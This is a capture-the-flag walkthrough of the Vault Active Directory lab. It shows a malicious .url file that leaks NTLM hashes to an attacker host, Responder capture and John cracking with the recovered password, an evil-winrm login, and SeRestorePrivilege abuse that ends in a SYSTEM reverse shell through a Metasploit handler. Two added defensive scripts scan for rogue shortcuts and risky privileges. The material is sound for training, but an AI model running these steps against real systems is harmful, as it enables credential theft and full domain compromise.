Vault

ZERO

The Vault machine is a medium-difficulty Active Directory (AD) box hosted on Hack The Box. It focuses on a misconfigured, world-writable SMB share, on capturing and cracking an NTLMv2 hash, and on abusing a dangerous token privilege (SeRestorePrivilege) for privilege escalation. In this walkthrough, I cover how I gained initial access, cracked the captured credentials, and escalated privileges to root (SYSTEM) access.

Step 1: Reconnaissance

I began by performing a full-port scan using nmap to identify open ports and services:

└─$ nmap -p- -sC -sV -T5 192.168.182.172

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-10-22 07:04:16Z)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 125
464/tcp   open  kpasswd5?     syn-ack ttl 125
593/tcp   open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 125
3268/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 125
3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: VAULT
|   NetBIOS_Domain_Name: VAULT
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: vault.offsec
|   DNS_Computer_Name: DC.vault.offsec
|   DNS_Tree_Name: vault.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2024-10-22T07:05:05+00:00

Step 2: Enumeration

SMB Enumeration

Using netexec, I enumerated the SMB shares to identify any writable shares:

└─$ netexec smb 192.168.182.172 -u 'zero' -p ''  --shares
Share           Permissions     Remark
-----           -----------     ------
ADMIN$                          Remote Admin
C$                              Default share
DocumentsShare  READ,WRITE      
IPC$            READ            Remote IPC
NETLOGON                        Logon server share
SYSVOL                          Logon server share

The DocumentsShare share has read and write permissions, which makes it a potential target for exploitation.

Exploiting Writable SMB Share

To capture an NTLM hash, I uploaded a malicious .url file to DocumentsShare. Its IconFile entry points at a UNC path on my attacker machine, so when a user browses the share in Explorer, Windows tries to fetch the icon over SMB and authenticates to my host with NTLM; Responder captures that challenge/response.

Creating the Malicious File

I created a malicious.url file with the following content:

└─$ cat malicious.url 
[InternetShortcut]
URL=Random_nonsense
WorkingDirectory=Flibertygibbit
IconFile=\\192.168.45.176\%USERNAME%.icon
IconIndex=1
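From the defender's side, the file above is easy to spot once you know what to look for: a shortcut whose IconFile points at a UNC host. The following is an added example, not code from the original post, that walks a locally mirrored copy of a share (assumed to have been pulled down with smbclient or a CIFS mount), parses every .url and .scf file as the INI-style format Explorer expects, and reports UNC-valued keys, rating IconFile highest because Explorer resolves it on folder listing without any click. The sample files, the trusted range 192.168.182.0/24 and the host name fileserver01 are constructed for the demo.

```python
#!/usr/bin/env python3
"""Hunt for NTLM-leaking shortcut files (.url/.scf) on a mirrored writable share.

Added example for this walkthrough, not code from the original post. It assumes the
share has been copied to a local directory (e.g. smbclient `recurse; mget *`); the
sample files, the trusted range 192.168.182.0/24 and host fileserver01 are constructed.
"""
import configparser
import ipaddress
import os
import re
import tempfile

# Explorer resolves IconFile as soon as the folder is listed, so a UNC value here
# makes every user who merely browses the share authenticate (NTLM) to that host.
AUTO_RESOLVED_KEYS = {"iconfile"}
SHORTCUT_EXTENSIONS = {".url", ".scf"}
UNC_RE = re.compile(r"^(?:\\\\|file://)([^\\/]+)[\\/]", re.IGNORECASE)


def parse_shortcut(text):
    """Return (section, key, host, severity) for every UNC-valued key."""
    # interpolation=None keeps %USERNAME% literal; strict=False tolerates duplicate keys.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return []  # not INI-shaped, so Explorer would not parse it either
    findings = []
    for section in cp.sections():
        for key, value in cp.items(section):
            match = UNC_RE.match(value.strip())
            if match:
                severity = "high" if key in AUTO_RESOLVED_KEYS else "medium"
                findings.append((section, key, match.group(1), severity))
    return findings


def classify_host(host, trusted_nets):
    """'trusted'/'untrusted' for IP literals; 'hostname' when DNS is needed."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"  # compare against your asset inventory
    return "trusted" if any(ip in net for net in trusted_nets) else "untrusted"


def read_text(path):
    """Shortcut files written on Windows are often UTF-16 with a BOM."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16", errors="ignore")
    return data.decode("utf-8-sig", errors="ignore")


def scan_directory(root, trusted_nets=()):
    """Walk a mirrored share and report every shortcut that points at a UNC host."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SHORTCUT_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            for section, key, host, severity in parse_shortcut(read_text(path)):
                results.append({"file": os.path.relpath(path, root), "section": section,
                                "key": key, "host": host, "severity": severity,
                                "host_class": classify_host(host, nets)})
    return results


# Constructed sample share: the walkthrough's file, a benign shortcut, an .scf
# variant pointing at a host name, and a non-shortcut file Explorer ignores.
SAMPLE_FILES = {
    "malicious.url": ("[InternetShortcut]\nURL=Random_nonsense\nWorkingDirectory=Flibertygibbit\n"
                      "IconFile=\\\\192.168.45.176\\%USERNAME%.icon\nIconIndex=1\n"),
    "intranet.url": ("[InternetShortcut]\nURL=https://intranet.example/\n"
                     "IconFile=C:\\Windows\\System32\\shell32.dll\nIconIndex=3\n"),
    "printer.scf": ("[Shell]\nCommand=2\nIconFile=\\\\fileserver01\\icons\\printer.ico\n"
                    "[Taskbar]\nCommand=ToggleDesktop\n"),
    "notes.txt": "IconFile=\\\\203.0.113.5\\x.ico\n",
}


def demo():
    """Write the constructed samples to a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as root:
        for name, text in SAMPLE_FILES.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(text)
        return scan_directory(root, trusted_nets=["192.168.182.0/24"])


if __name__ == "__main__":
    for f in demo():
        print(f"{f['severity']:6} {f['file']}: [{f['section']}] {f['key']} -> {f['host']} ({f['host_class']})")
```

Run against the mirrored share root instead of the demo directory to audit a real share; a "hostname" result is not automatically benign and should be checked against the servers that are actually supposed to host icons. The real fix for the share itself is to remove write access for Everyone/Authenticated Users and, where the icon path cannot be controlled, to block outbound SMB (TCP 445) from workstations to untrusted hosts so a rogue IconFile cannot complete the NTLM exchange.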

Uploading the File

I used smbclient to upload the file to the DocumentsShare:

└─$ smbclient -N //192.168.182.172/DocumentsShare

Try "help" to get a list of possible commands.
smb: \> put malicious.url

Capturing the Hash

On my attacker machine, I ran Responder to capture the NTLM hash:

└─$ sudo responder -I tun0

After triggering the .url file, Responder captured the following hash:

[SMB] NTLMv2-SSP Client   : 192.168.182.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash     : anirudh::VAULT:02383bfb6e95da3a:6E48603B.....

Cracking the Hash

I used John the Ripper to crack the captured hash:

└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
SecureHM         (anirudh)     
1g 0:00:00:01 DONE (2024-10-22 04:08) 0.5154g/s 5470Kp/s 5470Kc/s 5470KC/s Seifer@14..Sarahmasri
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

The password for the user anirudh is SecureHM.

Step 3: Initial Access

With valid credentials (anirudh:SecureHM), I logged into the machine using evil-winrm:

└─$ evil-winrm -i 192.168.182.172 -u 'vault.offsec\anirudh' -p 'SecureHM'

*Evil-WinRM* PS C:\Users\anirudh\Documents>

Success! I now had a shell as the anirudh user.

Step 4: Post-Exploitation

Running whoami /priv revealed that the anirudh account holds SeRestorePrivilege (alongside SeBackupPrivilege), which lets it write to any file or registry key regardless of the object's ACL; the privilege exists so that backup software can put files back with their original ownership and permissions:

*Evil-WinRM* PS C:\Users\anirudh> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

This privilege can be abused to execute commands as NT AUTHORITY\SYSTEM.
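A defender reviewing a low-privileged account should treat the table above as a finding in itself: on a domain controller, SeBackupPrivilege and SeRestorePrivilege are normally granted only to Administrators, Backup Operators and Server Operators through the Default Domain Controllers Policy, so a regular user holding them points at an over-broad group membership or a User Rights Assignment change. The following is an added example, not code from the original post, that parses `whoami /priv` output by using the `=` ruler line to derive column widths (so descriptions containing spaces are handled) and flags the privileges known to be equivalent to SYSTEM; the sample output is the anirudh listing from above, and the DANGEROUS table is my own selection.

```python
#!/usr/bin/env python3
"""Parse `whoami /priv` output and flag privileges that amount to local SYSTEM.

Added example for this walkthrough, not from the original post. The sample output
is the one shown above for the anirudh account; DANGEROUS is my own list of the
well-known token-privilege abuse primitives, not something from the page.
"""
import re

# Privileges whose holder can reach SYSTEM without any further bug. A
# "Disabled" state is no mitigation: the owning process can simply enable them.
DANGEROUS = {
    "SeRestorePrivilege": "write any file or registry key regardless of its ACL",
    "SeBackupPrivilege": "read any file regardless of its ACL (SAM, SYSTEM hive, NTDS.dit)",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open and inject into any process, including SYSTEM ones",
    "SeImpersonatePrivilege": "impersonate tokens handed to the process",
    "SeAssignPrimaryTokenPrivilege": "launch processes under an arbitrary token",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "forge access tokens",
    "SeManageVolumePrivilege": "raw access to volumes",
}

# Constructed sample: the listing captured in the walkthrough above.
WHOAMI_PRIV_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled
"""


def parse_whoami_priv(text):
    """Return [{'name', 'description', 'state'}], using the '=' ruler for column widths."""
    lines = text.splitlines()
    ruler = next((i for i, ln in enumerate(lines)
                  if ln.strip() and set(ln.strip()) <= {"=", " "}), None)
    if ruler is None:
        raise ValueError("no privilege table found in whoami output")
    spans = [(m.start(), m.end()) for m in re.finditer(r"=+", lines[ruler])]
    if len(spans) != 3:
        raise ValueError("unexpected column layout")
    rows = []
    for line in lines[ruler + 1:]:
        if not line.strip():
            continue
        rows.append({
            "name": line[spans[0][0]:spans[0][1]].strip(),
            "description": line[spans[1][0]:spans[1][1]].strip(),
            "state": line[spans[2][0]:].strip(),  # last column: rest of the line
        })
    return rows


def assess(rows):
    """Return the dangerous privileges in the parsed table, with why each matters."""
    return [{**row, "why": DANGEROUS[row["name"]]}
            for row in rows if row["name"] in DANGEROUS]


if __name__ == "__main__":
    for hit in assess(parse_whoami_priv(WHOAMI_PRIV_OUTPUT)):
        print(f"{hit['name']:30} {hit['state']:9} {hit['why']}")
```

Feed it the saved output of `whoami /priv` from any account under review; two hits (SeBackupPrivilege and SeRestorePrivilege) on a non-administrative domain user is the condition this box is built around, and the remediation is to remove the user from whichever operator group or GPO grants them.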

Step 5: Privilege Escalation

I downloaded the SeRestoreAbuse.exe tool from GitHub to exploit the SeRestorePrivilege. First, I uploaded the tool and a reverse shell executable to the target machine:

*Evil-WinRM* PS C:\Users\anirudh> upload ../home/zero/server/SeRestoreAbuse.exe
*Evil-WinRM* PS C:\Users\anirudh> upload ../home/zero/server/reverse.exe

Then, I executed the reverse shell as SYSTEM:

PS C:\Users\anirudh> SeRestoreAbuse.exe "cmd /c C:\users\anirudh\reverse.exe"

The reverse shell then connected to the multi/handler listener I had set up beforehand, giving me a shell as NT AUTHORITY\SYSTEM:

└─$ msfconsole -q -x "use multi/handler; set payload windows/x64/shell/reverse_tcp; set lhost 192.168.45.176; set lport 4444; exploit"
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/shell/reverse_tcp
lhost => 192.168.45.176
lport => 4444
[*] Started reverse TCP handler on 192.168.45.176:4444 
[*] Sending stage (336 bytes) to 192.168.182.172
[*] Command shell session 1 opened (192.168.45.176:4444 -> 192.168.182.172:51631) at 2024-10-22 06:04:34 -0400


Shell Banner:
Microsoft Windows [Version 10.0.17763.2300]
-----


C:\Windows\system32>whoami
whoami
nt authority\system

Written by

ZERO

I'm Mohamed Nour Alhaj, an OSCP-certified penetration tester with a passion for ethical hacking and cybersecurity. I specialize in web, network, and Active Directory security and love sharing my knowledge.